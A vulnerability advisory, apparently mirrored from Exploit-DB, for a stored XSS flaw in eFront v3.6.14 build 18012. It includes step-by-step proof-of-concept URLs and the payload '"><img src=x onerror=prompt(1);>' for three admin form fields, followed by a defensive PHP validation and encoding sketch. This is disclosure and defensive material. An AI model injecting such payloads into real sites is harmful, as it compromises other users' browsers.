vendor: eFront
by: sajith
CVSS: 7,5 (HIGH)
Stored XSS
CWE: 79
Product Name: eFront
Affected Version From: eFront v3.6.14- build 18012
Affected Version To: eFront v3.6.14- build 18012
Patch Exists: NO
Related CWE: N/A
CPE: efront_3.6.14_build18012_community
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

eFront v3.6.14 (build 18012) - Stored XSS in multiple Parameters

eFront v3.6.14 (build 18012) is vulnerable to stored XSS in multiple parameters. An attacker can inject malicious payloads into the Last Name, Lesson Name and Course Name fields. The payload used is '"><img src=x onerror=prompt(1);>'

Mitigation:

Input validation should be done on the server-side to prevent malicious payloads from being injected into the fields.
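The mitigation above, sketched as an added example (not eFront's code and not part of the original advisory): server-side validation of the three name fields, plus HTML output encoding when a stored value is rendered, which goes beyond the validation the page names. The function names and the allowed character set are assumptions chosen for illustration.

```php
<?php
declare(strict_types=1);

// Hypothetical helpers for illustration; these are not eFront functions.

/** Server-side allow-list check for a display name (last, lesson or course name). */
function validate_display_name(string $value): bool
{
    // Letters, marks, digits, spaces and a small set of punctuation, 1-100 chars.
    // Characters needed to break out of an HTML attribute (" < > =) are not allowed.
    return preg_match('/^[\p{L}\p{M}\p{N} .,\'()&_-]{1,100}$/u', $value) === 1;
}

/** Encode a stored value for HTML text or a quoted attribute value. */
function html_out(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Constructed sample submissions; the second one is the payload quoted on this page.
$samples = [
    'last name'   => "O'Brien",
    'lesson name' => '"><img src=x onerror=prompt(1);>',
    'course name' => 'Networks & Security (2020)',
];

foreach ($samples as $field => $value) {
    if (!validate_display_name($value)) {
        // Rejected input is encoded before it is echoed back in an error message.
        echo "REJECT $field: ", html_out($value), PHP_EOL;
        continue;
    }
    // Accepted values are still encoded at render time, so legitimate
    // characters such as ' and & cannot change the surrounding markup.
    echo "ACCEPT $field: <input name=\"x\" value=\"", html_out($value), "\">", PHP_EOL;
}
```

The payload is rejected by the allow-list and, even if it had been stored, would render as inert text (`&quot;&gt;&lt;img ...`) rather than as markup.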
Source

Exploit-DB raw data:

###########################################################

Exploit-DB Note: Screenshot provided by exploit author.

###########################################################
[~] Exploit Title: eFront v3.6.14 (build 18012) - Stored XSS in multiple Parameters
[~] Author: sajith
[~] Version: eFront v3.6.14- build 18012
[~] Vendor Homepage: http://www.efrontlearning.net/
[~] Vulnerable app link: http://www.efrontlearning.net/download
###########################################################



POC by sajith shetty:

[###] Log in with admin account and create new user

http://127.0.0.1/cms/efront_3.6.14_build18012_community/www/administrator.php?ctg=personal&user=root&op=profile&add_user=1

(Home » Users » Administrator S. (root) » New user)

Here "Last name" field is vulnerable to stored XSS [payload: "><img src=x onerror=prompt(1);> ]



[###] Create new lesson option (http://127.0.0.1/cms/efront_3.6.14_build18012_community/www/administrator.php?ctg=lessons&add_lesson=1) where "Lesson name" is vulnerable to stored XSS

[payload: "><img src=x onerror=prompt(1);> ]



[###] Create new courses option (http://127.0.0.1/cms/efront_3.6.14_build18012_community/www/administrator.php?ctg=courses&add_course=1) where "Course name:" field is vulnerable to stored XSS